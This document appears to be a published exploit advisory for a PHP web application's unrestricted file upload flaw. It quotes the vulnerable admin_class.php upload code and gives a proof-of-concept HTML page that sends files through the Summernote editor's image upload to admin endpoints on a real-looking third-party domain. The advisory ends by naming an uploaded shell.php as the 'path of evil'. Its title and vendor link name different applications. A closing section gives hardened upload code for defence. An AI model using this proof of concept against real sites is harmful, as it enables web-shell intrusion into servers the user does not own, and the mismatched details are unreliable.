Event Registration and Attendance System 1.0 Code Injection

Event Registration and Attendance System version 1.0 suffers from a code injection vulnerability.
=============================================================================================================================================
| # Title     : Event Registration and Attendance System 1.0 wysiwyg code injection Vulnerability
| # Author    : indoushka
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits)
| # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/online-news-portal.zip
=============================================================================================================================================

poc :

[+] Dorking in Google or other search engine.

[+] Infected item : admin_class.php

    $data .= ", content = '".htmlentities(str_replace("'","’",$content))."' ";
    if(!empty($_FILES['cover']['tmp_name'])){
        // file name is built from the client-supplied name; no extension or type check
        $fname = strtotime(date("Y-m-d H:i"))."_".(str_replace(" ","-",$_FILES['cover']['name']));
        $move = move_uploaded_file($_FILES['cover']['tmp_name'],'../assets/uploads/content_images/'. $fname);
        $protocol = strtolower(substr($_SERVER["SERVER_PROTOCOL"],0,5))=='https'?'https':'http';
        $hostName = $_SERVER['HTTP_HOST'];
        $path =explode('/',$_SERVER['PHP_SELF']);
        $currentPath = '/'.$path[1];
        if($move){
            $data .= ", cover_img='$fname' ";
        }
    }

[+] Line 27 : Set your target url.

[+] This payload is WYSIWYG based: the page can be edited remotely and a malicious executable file can be uploaded via Summernote, a WYSIWYG editor (version 0.8.18).

[+] Save payload as poc.html

[+] payload :

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Manage About Page</title>
    <!-- Include Summernote CSS and jQuery -->
    <link href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css" rel="stylesheet">
    <link href="https://cdnjs.cloudflare.com/ajax/libs/summernote/0.8.18/summernote-bs4.min.css" rel="stylesheet">
    <script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
    <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.bundle.min.js"></script>
    <script src="https://cdnjs.cloudflare.com/ajax/libs/summernote/0.8.18/summernote-bs4.min.js"></script>
</head>
<body>
    <div class="container mt-5">
        <div class="col-lg-12">
            <div class="card card-outline card-primary">
                <div class="card-body">
                    <form action="" id="manage-about">
                        <div class="form-group">
                            <textarea name="content" id="content" cols="30" rows="10" class="summernote2 form-control">
                                <p style="margin-right: 0px; margin-bottom: 15px; margin-left: 0px; padding: 0px; text-align: justify; color: rgb(0, 0, 0); font-family: 'Open Sans', Arial, sans-serif; font-size: 14px;">indoushka.</p>
                            </textarea>
                        </div>
                    </form>
                </div>
                <div class="card-footer border-top border-info">
                    <div class="d-flex w-100 justify-content-center align-items-center">
                        <button class="btn btn-flat bg-gradient-primary mx-2" form="manage-about">Save</button>
                    </div>
                </div>
            </div>
        </div>
    </div>

    <script>
    $(document).ready(function(){
        // Initialize Summernote Editor
        $('.summernote2').summernote({
            height: 300,
            toolbar: [
                ['style', ['style']],
                ['font', ['bold', 'italic', 'underline', 'strikethrough', 'superscript', 'subscript', 'clear']],
                ['fontname', ['fontname']],
                ['fontsize', ['fontsize']],
                ['color', ['color']],
                ['para', ['ol', 'ul', 'paragraph', 'height']],
                ['table', ['table']],
                ['insert', ['link', 'picture']],
                ['view', ['undo', 'redo', 'fullscreen', 'codeview', 'help']]
            ],
            callbacks: {
                onImageUpload: function(files) {
                    saveImg(files[0]); // Handle image upload
                }
            }
        });

        // Function to save uploaded image
        function saveImg(_file) {
            var data = new FormData();
            data.append("file", _file);
            $.ajax({
                data: data,
                type: "POST",
                url: "http://www.news.witnessradio.org/admin/ajax.php?action=save_image",
                cache: false,
                contentType: false,
                processData: false,
                success: function(resp) {
                    var image = $('<img>').attr('src', resp);
                    $('.summernote2').summernote("insertNode", image[0]);
                }
            });
        }
    });

    // Form Submission
    $('#manage-about').submit(function(e) {
        e.preventDefault();
        start_load(); // Start a loading indicator (you need to define this function)
        $.ajax({
            url: 'http://www.news.witnessradio.org/admin/ajax.php?action=save_about',
            data: new FormData($(this)[0]),
            cache: false,
            contentType: false,
            processData: false,
            method: 'POST',
            type: 'POST',
            success: function(resp) {
                if(resp == 1) {
                    alert_toast('Data successfully saved', "success");
                    end_load(); // End the loading indicator (you need to define this function)
                }
            }
        });
    });

    // Optional: Define start_load and end_load functions
    function start_load() {
        // Add your loading indicator logic here
    }
    function end_load() {
        // Remove your loading indicator logic here
    }
    function alert_toast(message, type) {
        alert(message); // Basic alert. Replace with a better toast notification if needed.
    }
    </script>
</body>
</html>

[+] path of evil : http://127.0.0.1/news_portal/assets/uploads/content_images/shell.php

Greetings to :
============================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr
==========================================================================
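The root cause in the admin_class.php branch above is that move_uploaded_file() stores whatever the client sends, under a name derived from the client-supplied file name, inside a web-served directory. The following is an added hardened replacement for that branch (my example, not the vendor's or the advisory author's code); the function name store_cover_image and the upload directory argument are assumptions for illustration, and the same check applies to the ajax.php save_image handler used by the Summernote image callback.

```php
<?php
// Added example (not part of the advisory or the vendor's code): a hardened
// replacement for the cover-image branch of admin_class.php. It sniffs the
// MIME type from file content, whitelists image types, discards the
// client-supplied file name and writes under a server-generated name.
function store_cover_image(array $file, string $uploadDir): ?string
{
    // Only accept a real upload that completed without a PHP-level error.
    if (($file['error'] ?? UPLOAD_ERR_NO_FILE) !== UPLOAD_ERR_OK
        || !is_uploaded_file($file['tmp_name'])) {
        return null;
    }
    // Cap size (2 MiB, an assumed limit) to bound disk abuse.
    if ($file['size'] > 2 * 1024 * 1024) {
        return null;
    }
    // Decide the type from the bytes on disk, never from the name or the
    // client-declared Content-Type.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($file['tmp_name']);
    $allowed = [
        'image/jpeg' => 'jpg',
        'image/png'  => 'png',
        'image/gif'  => 'gif',
        'image/webp' => 'webp',
    ];
    if (!isset($allowed[$mime])) {
        return null; // .php/.phtml, SVG with script, etc. never reach disk
    }
    // Server-chosen name: no path separators, no double extensions,
    // and the extension always matches the sniffed type.
    $fname = bin2hex(random_bytes(16)) . '.' . $allowed[$mime];
    $dest  = rtrim($uploadDir, '/') . '/' . $fname;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        return null;
    }
    chmod($dest, 0644); // readable by the web server, not executable
    return $fname;
}

// Drop-in usage at the same spot as the original branch:
if (!empty($_FILES['cover']['tmp_name'])) {
    $fname = store_cover_image($_FILES['cover'], '../assets/uploads/content_images');
    if ($fname !== null) {
        // $fname is hex plus a whitelisted extension, so it is safe to embed here
        $data .= ", cover_img='" . $fname . "' ";
    }
}
```

Pair this with a web-server rule that refuses to execute scripts under assets/uploads/ (for example, no PHP handler mapped for that directory), so a bypass of the type check still cannot yield code execution.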